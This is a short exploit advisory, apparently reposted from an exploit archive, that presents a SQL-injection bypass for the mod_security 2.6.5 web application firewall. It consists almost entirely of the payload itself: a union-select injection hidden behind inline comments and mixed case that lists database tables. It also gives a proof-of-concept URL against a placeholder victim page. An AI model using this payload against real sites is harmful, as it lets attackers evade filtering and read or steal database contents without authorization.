# Exploit Title: mod_security 2.6.5 SQL injection bypass. # Date: 21/04/2012 # Author: Phizo # Software Link: http://www.modsecurity.org/ # Version: 2.6.5 # Tested on: Windows 7 & Ubuntu 10.04 ---------------------------------------------------------------- /** Although I am using union-based injection the concept of the bypass is the same **/ [+] Bypass: +/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,/*!/**/cOnCaT/**/*/(/*!table_name*/),6,7,8,9,10+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/# [+] PoC: http://victim/page.php?id=12+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,/*!/**/cOnCaT/**/*/(/*!table_name*/),6,7,8,9,10+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/#Брой прочитания на тази страница: 1298
mod_security 2.6.5 SQLi bypass